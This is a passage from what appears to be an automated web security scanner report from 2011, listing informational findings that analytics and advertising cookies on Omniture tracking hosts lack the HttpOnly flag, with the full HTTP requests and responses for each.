P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=HMxtN5pqGIxFGFuovcg3sYkhSK8BItdByeQ3WXgsHMa4FI7BKGeByeQ3gZgs1q6BaMrRGW7qHEysGIbkBcAoNXs2xOyBsRphy2I9HsfzF18i4eQBwW04w65BvHphxXJ9HsuoGN+kQdANZXY8s6+BBMnhxTrcHsNrGGfqHcwzeZY8gCGCvCiBwB; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/
Set-Cookie: GUID=MTMwMzg0MzU5MTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Thu, 25-Apr-2013 18:46:31 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 26 Apr 2011 19:46:31 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

14.94. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/1303842955283  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnportal.112.2o7.net
Path:   /b/ss/msnportalusenmoney/1/H.7-pdv-2/1303842955283

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalusenmoney/1/H.7-pdv-2/1303842955283?[AQB]&c22=False&c3=Home&c2=en-us&pageName=%2F&c23=&c10=Money%3A+Personal+finance+%26+investing+news+%26+advice+-+MSN+Money&c=16&bh=954&bw=1082&g=http%3A%2F%2Fmoney.msn.com%2F&s=1920x1200&k=Y&c29=http%3A%2F%2Fmoney.msn.com%2F&ct=LAN&v1=4%2F2011&v2=4%2F26%2F2011&t=26%2F3%2F2011+13%3A35%3A55+2+300&server=money.msn.com&cc=USD&c1=Money&v=Y&j=1.3&ns=MSN+Portal&[AQE] HTTP/1.1
Host: msnportal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:35:46 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DB884105161DBC-40000182C0002B6F[CE]; Expires=Sun, 24 Apr 2016 18:35:46 GMT; Domain=msnportal.112.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/1303842955283?AQB=1&pccr=true&vidn=26DB884105161DBC-40000182C0002B6F&&c22=False&c3=Home&c2=en-us&pageName=%2F&c23=&c10=Money%3A+Personal+finance+%26+investing+news+%26+advice+-+MSN+Money&c=16&bh=954&bw=1082&g=http%3A%2F%2Fmoney.msn.com%2F&s=1920x1200&k=Y&c29=http%3A%2F%2Fmoney.msn.com%2F&ct=LAN&v1=4%2F2011&v2=4%2F26%2F2011&t=26%2F3%2F2011+13%3A35%3A55+2+300&server=money.msn.com&cc=USD&c1=Money&v=Y&j=1.3&ns=MSN+Portal&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 18:35:46 GMT
Last-Modified: Wed, 27 Apr 2011 18:35:46 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www422
Content-Length: 0
Content-Type: text/plain


14.95. http://o.computerworlduk.com/b/ss/idgcomputerworld/1/H.19.4/s72592209363356  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.computerworlduk.com
Path:   /b/ss/idgcomputerworld/1/H.19.4/s72592209363356

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/idgcomputerworld/1/H.19.4/s72592209363356?AQB=1&ndh=1&t=26/3/2011%2016%3A49%3A29%202%20300&ns=idguk&cdp=3&pageName=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability%20-%20security%20-%20news&g=http%3A//www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/%3Folo%3Drss&ch=security&server=box1&events=event2&h1=news%2Csecurity%2Cnews%20article%20pages&c4=news&v4=news&c5=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability&v5=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability&c6=3276305&v6=3276305&c8=9%3A30PM&v8=9%3A30PM&c9=Tuesday&v9=Tuesday&c10=Weekday&v10=Weekday&v11=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability%20-%20security%20-%20news&v12=security&c14=rss&c16=anonymous&v16=anonymous&c27=ellen%20messmer&v27=ellen%20messmer&c28=network%20world%20us&v28=network%20world%20us&c30=apr%202011&v30=apr%202011&c41=0.5%20%3C%201&c42=%3E%2010&c43=article&c44=jim%20ottewill&c45=idg%20news%20service&c46=no&c47=24%20Apr%202011&c48=26%20Apr%202011&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.computerworlduk.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=623037e9893129cc51ee472d192c4c186210; __utmz=129297054.1303854555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129297054.1937977063.1303854555.1303854555.1303854555.1; __utmc=129297054; __utmb=129297054.1.10.1303854555; __unam=8f316ea-12f93c9a01d-4bc8d0c8-1

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 21:50:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DB9F1D051D38FF-60000135A008B65D[CE]; Expires=Sun, 24 Apr 2016 21:50:50 GMT; Domain=o.computerworlduk.com; Path=/
Location: http://o.computerworlduk.com/b/ss/idgcomputerworld/1/H.19.4/s72592209363356?AQB=1&pccr=true&vidn=26DB9F1D051D38FF-60000135A008B65D&&ndh=1&t=26/3/2011%2016%3A49%3A29%202%20300&ns=idguk&cdp=3&pageName=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability%20-%20security%20-%20news&g=http%3A//www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/%3Folo%3Drss&ch=security&server=box1&events=event2&h1=news%2Csecurity%2Cnews%20article%20pages&c4=news&v4=news&c5=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability&v5=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability&c6=3276305&v6=3276305&c8=9%3A30PM&v8=9%3A30PM&c9=Tuesday&v9=Tuesday&c10=Weekday&v10=Weekday&v11=oracle%20responds%20to%20hacker%20group%20and%20patches%20javacom%20vulnerability%20-%20security%20-%20news&v12=security&c14=rss&c16=anonymous&v16=anonymous&c27=ellen%20messmer&v27=ellen%20messmer&c28=network%20world%20us&v28=network%20world%20us&c30=apr%202011&v30=apr%202011&c41=0.5%20%3C%201&c42=%3E%2010&c43=article&c44=jim%20ottewill&c45=idg%20news%20service&c46=no&c47=24%20Apr%202011&c48=26%20Apr%202011&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:50:50 GMT
Last-Modified: Wed, 27 Apr 2011 21:50:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www373
Content-Length: 0
Content-Type: text/plain


14.96. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72142050643632?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A13%202%20300&pageName=Omniture%20Password%20Recovery%20Page&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//Omniture%20Password%20Recovery%20Page&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:33 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E5-0644-43C112C6"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www325
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.97. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72645798081596?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A20%202%20300&pageName=Omniture%20Password%20Recovery%20Page&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home//Omniture%20Password%20Recovery%20Page&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:40 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:40 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736EC-3461-5AAAA36E"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www632
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.98. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s72918755419910?[AQB]&ndh=1&t=26/3/2011%2016%3A14%3A51%202%20300&pageName=support_popup_form&ch=contact&products=contact_us%3Bsupport_popup_form&c1=noncustomer&v1=noncustomer&h1=Home/contact/support_popup_form&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|0-0|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9B6F0514A7F9-60000166C0045A33|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9B6F0514A7F9-60000166C0045A35|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9B6F0514A7F9-60000166C0045A37|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9B6F0514A7F9-60000166C0045A39|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:26 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:26 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736DE-4FEF-5A46783B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www254
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.99. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s75575511181236?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A17%202%20300&pageName=support_popup_form_success&ch=contact&events=event2&products=contact_us%3Bsupport_popup_form_success&c1=noncustomer&v1=noncustomer&h1=Home/contact/support_popup_form_success&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:34 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:34 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736E6-5724-63E34504"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.100. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s79267593701483?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A22%202%20300&pageName=policy&ch=privacy&products=%3B&c1=noncustomer&v1=noncustomer&h1=Home/privacy/policy&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:45 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:45 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB736F1-3461-003B0596"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www632
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

14.101. http://omniture.112.2o7.net/b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omniture.112.2o7.net
Path:   /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/omniture,omnitureglobal,omniturenew,omniturevisitor/1/G.6-Pd-F/s7968447030146?[AQB]&ndh=1&t=26/3/2011%2016%3A15%3A17%202%20300&pageName=support_popup_form_success&ch=contact&events=event2&products=contact_us%3Bsupport_popup_form_success&c1=noncustomer&v1=noncustomer&h1=Home/contact/support_popup_form_success&c2=about%3Ablank&c3=Old%20Site&g=about%3Ablank&s=1920x1200&c=16&j=1.3&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&[AQE] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: omniture.112.2o7.net
Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:19:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_gefax7Cx7Dzm=[CS]v4|26DB9AE00514B5E0-600001538000035D|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_acx60gzx7Bx7Ckibalob=[CS]v4|26DB9AE00514B5E0-600001538000035F|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_dfebx7Fx7Eynenx7C=[CS]v4|26DB9AE00514B5E0-6000015380000361|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60bafx7Bzx7Djyfx7Cfx7Bx60x7D=[CS]v4|26DB9AE00514B5E0-6000015380000363|4DB735BE[CE]; Expires=Sun, 24 Apr 2016 21:19:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 21:19:33 GMT
Last-Modified: Wed, 27 Apr 2011 21:19:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
